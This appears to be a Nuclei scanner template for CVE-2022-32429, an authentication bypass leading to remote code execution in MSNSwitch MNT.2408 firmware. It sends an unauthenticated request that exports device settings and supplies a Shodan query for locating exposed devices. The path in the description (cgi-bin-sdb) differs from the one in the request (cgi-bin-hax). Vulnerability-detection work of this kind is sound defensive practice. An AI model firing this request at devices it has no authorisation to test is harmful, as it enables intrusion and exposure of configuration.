id: CVE-2022-32429

info:
  name: MSNSwitch Firmware MNT.2408 - Remote Code Exectuion (RCE)
  author: theabhinavgaur
  severity: critical
  description: |
    An authentication-bypass issue in the component http://MYDEVICEIP/cgi-bin-sdb/ExportSettings.sh of Mega System Technologies Inc MSNSwitch MNT.2408 allows unauthenticated attackers to arbitrarily configure settings within the application, leading to remote code execution.
  reference:
    - https://packetstormsecurity.com/files/169819/MSNSwitch-Firmware-MNT.2408-Remote-Code-Execution.html
    - https://elifulkerson.com/CVE-2022-32429/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-32429
  classification:
    cve-id: CVE-2022-32429
    cwe-id: CWE-288
  metadata:
    verified: "true"
    shodan-query: "MSNSwitch"
  tags: cve,cve2022,msmswitch,unauth,switch


requests:
  - method: GET
    path:
      - "{{BaseURL}}/cgi-bin-hax/ExportSettings.sh"
      
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "SSID1"

      - type: status
        status:
          - 200